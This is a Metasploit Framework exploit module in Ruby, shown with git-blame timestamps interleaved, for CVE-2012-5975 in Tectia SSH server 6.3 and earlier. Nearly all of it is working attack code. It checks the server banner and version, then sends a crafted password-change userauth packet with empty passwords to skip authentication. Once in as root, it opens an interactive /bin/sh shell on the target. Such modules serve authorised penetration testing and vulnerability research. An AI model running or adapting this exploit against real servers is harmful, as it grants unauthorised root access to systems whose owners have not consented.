2012-12-04 03:07:32 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'net/ssh'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Tectia SSH USERAUTH Change Request Password Reset Vulnerability",
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a vulnerability in Tectia SSH server for Unix-based
|
|
|
|
platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request
|
2012-12-04 15:56:51 +00:00
|
|
|
before password authentication, allowing any remote user to bypass the login
|
|
|
|
routine, and then gain access as root.
|
2012-12-04 03:07:32 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'kingcope', #Original 0day
|
|
|
|
'bperry',
|
|
|
|
'sinn3r'
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
2012-12-05 16:13:44 +00:00
|
|
|
['CVE', '2012-5975'],
|
2012-12-04 03:07:32 +00:00
|
|
|
['EDB', '23082'],
|
2012-12-05 16:13:44 +00:00
|
|
|
['URL', 'http://seclists.org/fulldisclosure/2012/Dec/12'],
|
|
|
|
['URL', 'http://www.ssh.com/index.php/component/content/article/531.html']
|
2012-12-04 03:07:32 +00:00
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
2012-12-04 15:25:24 +00:00
|
|
|
'Compat' =>
|
|
|
|
{
|
2012-12-04 03:07:32 +00:00
|
|
|
'PayloadType' => 'cmd_interact',
|
|
|
|
'ConnectionType' => 'find'
|
|
|
|
}
|
|
|
|
},
|
|
|
|
'Platform' => 'unix',
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2012-12-06 03:38:31 +00:00
|
|
|
['Unix-based Tectia SSH 6.3 or prior', {}]
|
2012-12-04 03:07:32 +00:00
|
|
|
],
|
|
|
|
'Privileged' => true,
|
|
|
|
'DisclosureDate' => "Dec 01 2012",
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(22),
|
|
|
|
OptString.new('USERNAME', [true, 'The username to login as', 'root'])
|
|
|
|
], self.class
|
|
|
|
)
|
|
|
|
|
|
|
|
register_advanced_options(
|
|
|
|
[
|
|
|
|
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
|
|
|
|
]
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
connect
|
2012-12-06 03:34:33 +00:00
|
|
|
banner = sock.get_once.strip
|
|
|
|
print_status("#{rhost}:#{rport} - Banner: #{banner}")
|
2012-12-04 03:07:32 +00:00
|
|
|
disconnect
|
|
|
|
|
2012-12-06 03:34:33 +00:00
|
|
|
# Vulnerable version info obtained from CVE
|
|
|
|
version = banner.scan(/\-(\d\.\d\.\d*).+SSH Tectia/).flatten[0] || ''
|
|
|
|
build = version.split('.')[-1].to_i
|
|
|
|
|
|
|
|
case version
|
|
|
|
when /^6\.0/
|
|
|
|
unless (4..14).include?(build) or (17..20).include?(build)
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
when /^6\.1/
|
|
|
|
unless (0..9).include?(build) or build == 12
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
when /^6\.2/
|
|
|
|
unless (0..5).include?(build)
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
when /^6\.3/
|
|
|
|
unless (0..2).include?(build)
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
else
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
# The vulnerable version must use PASSWORD method
|
|
|
|
user = Rex::Text.rand_text_alpha(4)
|
|
|
|
transport, connection = init_ssh(user)
|
|
|
|
return Exploit::CheckCode::Vulnerable if is_passwd_method?(user, transport)
|
|
|
|
|
2012-12-04 03:07:32 +00:00
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
def rhost
|
|
|
|
datastore['RHOST']
|
|
|
|
end
|
|
|
|
|
|
|
|
def rport
|
|
|
|
datastore['RPORT']
|
|
|
|
end
|
|
|
|
|
2012-12-06 03:34:33 +00:00
|
|
|
def is_passwd_method?(user, transport)
|
|
|
|
# A normal client is expected to send a ssh-userauth packet.
|
|
|
|
# Without it, the module can hang against non-vulnerable SSH servers.
|
|
|
|
transport.send_message(transport.service_request("ssh-userauth"))
|
|
|
|
message = transport.next_message
|
2012-12-04 03:07:32 +00:00
|
|
|
|
2012-12-06 03:34:33 +00:00
|
|
|
# 6 means SERVICE_ACCEPT
|
|
|
|
if message.type != 6
|
|
|
|
print_error("Unexpected message: #{message.inspect}")
|
|
|
|
return false
|
|
|
|
end
|
2012-12-04 03:07:32 +00:00
|
|
|
|
2012-12-06 03:34:33 +00:00
|
|
|
# We send this packet as an attempt to see what auth methods are available.
|
|
|
|
# The only auth method we want is PASSWORD.
|
|
|
|
pkt = Net::SSH::Buffer.from(
|
|
|
|
:byte, 0x32, #userauth request
|
|
|
|
:string, user, #username
|
|
|
|
:string, "ssh-connection", #service
|
|
|
|
:string, "password" #method name
|
|
|
|
)
|
|
|
|
pkt.write_bool(true)
|
|
|
|
pkt.write_string("") #Old pass
|
|
|
|
pkt.write_string("") #New pass
|
2012-12-04 03:07:32 +00:00
|
|
|
|
2012-12-06 03:34:33 +00:00
|
|
|
transport.send_message(pkt)
|
2012-12-04 03:07:32 +00:00
|
|
|
message = transport.next_message
|
|
|
|
|
2012-12-06 03:34:33 +00:00
|
|
|
# Type 51 means the server is trying to tell us what auth methods are allowed.
|
|
|
|
if message.type == 51 and message !~ /password/
|
|
|
|
print_error("#{rhost}:#{rport} - This host does not use password method authentication")
|
|
|
|
return false
|
2012-12-04 03:07:32 +00:00
|
|
|
end
|
|
|
|
|
2012-12-06 03:34:33 +00:00
|
|
|
return true
|
|
|
|
end
|
2012-12-04 03:07:32 +00:00
|
|
|
|
|
|
|
#
|
|
|
|
# The following link is useful to understand how to craft the USERAUTH password change
|
|
|
|
# request packet:
|
|
|
|
# http://fossies.org/dox/openssh-6.1p1/sshconnect2_8c_source.html#l00903
|
|
|
|
#
|
|
|
|
def userauth_passwd_change(user, transport, connection)
|
|
|
|
print_status("#{rhost}:#{rport} - Sending USERAUTH Change request...")
|
|
|
|
pkt = Net::SSH::Buffer.from(
|
|
|
|
:byte, 0x32, #userauth request
|
|
|
|
:string, user, #username
|
|
|
|
:string, "ssh-connection", #service
|
|
|
|
:string, "password" #method name
|
|
|
|
)
|
|
|
|
pkt.write_bool(true)
|
|
|
|
pkt.write_string("") #Old pass
|
|
|
|
pkt.write_string("") #New pass
|
|
|
|
|
|
|
|
transport.send_message(pkt)
|
|
|
|
message = transport.next_message.type
|
2012-12-06 03:34:33 +00:00
|
|
|
print_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")
|
2012-12-04 03:07:32 +00:00
|
|
|
|
|
|
|
if message.to_i == 52 #SSH2_MSG_USERAUTH_SUCCESS
|
|
|
|
transport.send_message(transport.service_request("ssh-userauth"))
|
|
|
|
message = transport.next_message.type
|
|
|
|
|
|
|
|
if message.to_i == 6 #SSH2_MSG_SERVICE_ACCEPT
|
|
|
|
shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true)
|
|
|
|
connection = nil
|
|
|
|
return shell
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2012-12-06 03:34:33 +00:00
|
|
|
def init_ssh(user)
|
2012-12-04 03:07:32 +00:00
|
|
|
opts = {:user=>user, :record_auth_info=>true}
|
|
|
|
options = Net::SSH::Config.for(rhost, Net::SSH::Config.default_files).merge(opts)
|
|
|
|
transport = Net::SSH::Transport::Session.new(rhost, options)
|
|
|
|
connection = Net::SSH::Connection::Session.new(transport, options)
|
2012-12-06 03:34:33 +00:00
|
|
|
|
|
|
|
return transport, connection
|
2012-12-04 03:07:32 +00:00
|
|
|
end
|
|
|
|
|
2012-12-06 03:34:33 +00:00
|
|
|
def do_login(user)
|
|
|
|
transport, connection = init_ssh(user)
|
|
|
|
passwd = is_passwd_method?(user, transport)
|
|
|
|
|
|
|
|
if passwd
|
|
|
|
conn = userauth_passwd_change(user, transport, connection)
|
|
|
|
return conn
|
2012-12-04 03:07:32 +00:00
|
|
|
end
|
2012-12-06 03:34:33 +00:00
|
|
|
end
|
2012-12-04 03:07:32 +00:00
|
|
|
|
2012-12-06 03:34:33 +00:00
|
|
|
def exploit
|
2012-12-04 03:07:32 +00:00
|
|
|
c = nil
|
|
|
|
|
|
|
|
begin
|
2012-12-04 03:09:07 +00:00
|
|
|
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
|
2012-12-04 03:07:32 +00:00
|
|
|
c = do_login(datastore['USERNAME'])
|
|
|
|
end
|
|
|
|
rescue Rex::ConnectionError, Rex::AddressInUse
|
|
|
|
return
|
|
|
|
rescue Net::SSH::Disconnect, ::EOFError
|
|
|
|
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
|
|
|
|
return
|
|
|
|
rescue Net::SSH::Exception => e
|
|
|
|
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
|
|
|
|
return
|
|
|
|
rescue ::Timeout::Error
|
|
|
|
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
handler(c.lsock) if c
|
|
|
|
end
|
|
|
|
end
|